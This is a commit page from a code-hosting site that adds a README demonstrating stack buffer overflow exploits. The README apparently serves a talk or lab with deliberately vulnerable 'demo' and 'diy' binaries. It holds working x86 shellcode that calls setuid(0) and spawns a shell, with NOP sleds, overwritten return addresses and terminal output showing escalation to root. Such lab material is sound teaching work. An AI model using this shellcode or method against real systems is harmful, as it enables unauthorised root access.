ward/smash-talk
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

minor improvements

Browse source
This commit is contained in:
Ward Wouts 2023-03-08 10:32:57 +01:00
parent cce16c40ff
commit 03cd6ada44
2 changed files with 64 additions and 16 deletions
Download patch file Download diff file Expand all files Collapse all files

42
README.md Normal file
View file

@ -0,0 +1,42 @@
## Demo
Make sure to point at the shellcode in the commandline, NOT the copied shellcode as that gets mangled. Or pad the shellcode with 20 bytes at the end and make the starter NOP-sled shorter.
```
atl.HA95-mHA95:wwouts_smash:/smash $ id
uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
sh-4.4# exit
```
```
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`
```
## DIY
```
export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
gdb ./diy
atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt
atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
ls
demo diy foo.txt setup.sh shellcode.txt shellcode2.txt
id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
```
Test without the dodgy push EBX
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'`